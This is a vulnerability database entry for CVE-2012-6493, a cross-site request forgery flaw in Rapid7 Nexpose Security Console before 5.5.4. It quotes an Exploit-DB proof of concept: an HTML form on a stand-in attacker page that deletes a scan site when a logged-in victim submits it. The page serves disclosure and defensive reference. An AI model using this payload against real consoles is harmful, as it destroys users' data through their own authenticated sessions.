CVE-2012-6493
Description
Cross-site request forgery (CSRF) vulnerability in Rapid7 Nexpose Security Console before 5.5.4 allows remote attackers to hijack the authentication of unspecified victims for requests that delete scan data and sites via a request to data/site/delete.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Nexpose Security Console - Cross-Site Request Forgery
Product: Nexpose Security Console
Vendor: Rapid7
Version: < 5.5.3
Tested Version: 5.5.1
Vendor Notified Date: December 19, 2012
Release Date: January 2, 2013
Risk: High
Authentication: None required
Remote: Yes
Description:
Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Nexpose
Security Console 5.5.3 and below allow remote attackers to submit
actions on a legitimate user’s behalf.
By not properly checking each URL, an attacker can execute requests on
behalf of a legitimate user.
If an authenticated user is tricked into visiting a specially crafted
page, it may be possible to perform user-initiated actions on the web
application using the victim’s established session.
Successful exploitation of this vulnerability resulted in deleting scan
data and sites during the proof-of-concept.
Exploit steps for proof-of-concept:
1. Create an external site/page:
http://attackersite.com/nexpose-csrf.htm that contains:
[code]
<html>
<!-- Nexpose CSRF PoC -->
<body>
<form
action="https://nexpose-security-console-site:3780/data/site/delete?siteid=1"
method="POST" enctype="multipart/form-data">
<input type="submit" value="delete site" />
</form>
<script>
//document.forms[0].submit(); //uncomment to auto-submit
</script>
</body>
</html>
[/code]
2. Lure victim to http://attackersite.com/nexpose-csrf.htm.
3. Site with ID 1 is deleted when form is submitted.
Vendor Notified: Yes
Vendor Response: Quickly escalated and resolved.
Vendor Update: Remediated in 5.5.4.
Reference:
CVE-2012-6493
https://community.rapid7.com/docs/DOC-2065#release5
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
Credit:
Robert Gilbert
HALOCK Security LabsApplication impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| rapid7 | nexpose | {"endIncluding":"5.5.3"} | |
| rapid7 | nexpose | 5.4 | |
| rapid7 | nexpose | 5.4.1 | |
| rapid7 | nexpose | 5.4.2 | |
| rapid7 | nexpose | 5.4.3 | |
| rapid7 | nexpose | 5.4.4 | |
| rapid7 | nexpose | 5.4.5 | |
| rapid7 | nexpose | 5.4.6 | |
| rapid7 | nexpose | 5.4.7 | |
| rapid7 | nexpose | 5.4.8 | |
| rapid7 | nexpose | 5.4.9 | |
| rapid7 | nexpose | 5.4.10 | |
| rapid7 | nexpose | 5.4.11 | |
| rapid7 | nexpose | 5.4.12 | |
| rapid7 | nexpose | 5.5.1 | |
References
- http://archives.neohapsis.com/archives/bugtraq/2013-01/0014.html
- http://osvdb.org/88923
- http://packetstormsecurity.com/files/119260/Nexpose-Security-Console-Cross-Site-Request-Forgery.html
- http://www.exploit-db.com/exploits/23924
- https://community.rapid7.com/docs/DOC-2155#release1
- http://archives.neohapsis.com/archives/bugtraq/2013-01/0014.html
- http://osvdb.org/88923
- http://packetstormsecurity.com/files/119260/Nexpose-Security-Console-Cross-Site-Request-Forgery.html
- http://www.exploit-db.com/exploits/23924
- https://community.rapid7.com/docs/DOC-2155#release1
CWEs
CWE-352
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.